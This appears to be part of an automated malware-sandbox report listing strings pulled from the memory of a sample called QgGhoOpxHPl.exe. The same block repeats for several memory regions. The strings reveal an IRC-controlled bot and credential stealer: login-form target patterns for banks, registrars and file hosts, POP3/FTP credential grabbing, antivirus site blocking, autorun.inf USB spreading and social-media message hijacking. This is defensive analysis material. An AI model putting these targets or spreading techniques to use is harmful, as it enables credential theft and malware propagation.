            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000013.00000002.620940422.0000000000220000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000014.00000002.621011349.0000000000320000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000015.00000002.621699118.0000000000510000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*